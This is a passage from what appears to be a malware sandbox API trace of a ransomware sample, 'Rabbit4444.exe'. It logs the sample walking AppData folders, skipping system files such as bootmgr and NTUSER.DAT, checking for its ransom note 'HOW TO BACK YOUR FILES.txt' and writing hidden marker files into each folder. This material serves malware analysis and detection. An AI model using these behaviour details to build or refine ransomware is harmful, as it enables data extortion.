lpString2="Rabbit4444.exe") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0064.406] lstrcpyW (in: lpString1=0x130ebd2, lpString2="AC" | out: lpString1="AC") returned="AC" [0064.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0064.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0x121b00 [0064.406] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x11cd28 [0064.406] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0fb524, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152d29c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea0fb524, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0064.406] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0064.406] lstrcpyW (in: lpString1=0x130ebd2, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0064.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0064.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124028 [0064.407] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x121fe8 [0064.407] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152db4f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea0165be, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0064.407] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0064.407] lstrcpyW (in: lpString1=0x130ebd2, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0064.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0064.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124308 [0064.407] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122248 [0064.407] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbe9a3b7f, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xbe9a3b7f, ftLastWriteTime.dwHighDateTime=0x1d32746, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0064.407] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0064.407] lstrcpyW (in: lpString1=0x130ebd2, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0064.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0064.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124530 [0064.407] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122328 [0064.407] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1649d0c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea0165be, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0064.407] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0064.408] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0064.408] lstrcpyW (in: lpString1=0x130ebd2, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0064.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0064.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122e40 [0064.408] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122308 [0064.408] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x71318bbc, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0064.408] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0064.408] lstrcpyW (in: lpString1=0x130ebd2, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0064.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0064.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123bd8 [0064.408] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122068 [0064.408] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8681db72, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8681db72, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8681db72, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0064.408] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.408] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.408] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0064.409] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0064.409] lstrcpyW (in: lpString1=0x130ebd2, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0064.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0064.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122a80 [0064.409] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x1222e8 [0064.409] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd16e5539, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea0165be, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0064.409] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0064.409] lstrcpyW (in: lpString1=0x130ebd2, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0064.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0064.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124810 [0064.409] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122168 [0064.409] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd16e5539, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea0165be, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0064.409] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.409] lstrcpyW (in: lpString1=0x130ebd2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.410] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.411] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.411] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.411] CloseHandle (hObject=0x2a0) returned 1 [0064.411] CloseHandle (hObject=0x2cc) returned 1 [0064.411] GetCurrentThreadId () returned 0xd98 [0064.411] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0064.411] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState" [0064.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124810 | out: hHeap=0xe0000) returned 1 [0064.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0064.411] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState" [0064.411] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\" [0064.411] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0064.411] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.413] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.416] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.416] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.416] CloseHandle (hObject=0x2cc) returned 1 [0064.417] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState") returned 86 [0064.417] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd16e5539, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb64873, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.417] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.417] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.417] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.417] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.417] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd16e5539, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb64873, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.417] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.417] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.417] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.417] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.417] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.417] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb64873, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb64873, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.417] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.417] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.417] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb64873, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb64873, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.418] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.418] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.418] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.418] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.418] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.419] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.419] CloseHandle (hObject=0x2a0) returned 1 [0064.419] CloseHandle (hObject=0x2cc) returned 1 [0064.419] GetCurrentThreadId () returned 0xd98 [0064.419] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0064.419] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData" [0064.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122a80 | out: hHeap=0xe0000) returned 1 [0064.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0064.419] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData" [0064.419] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\" [0064.419] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0064.419] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.422] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, 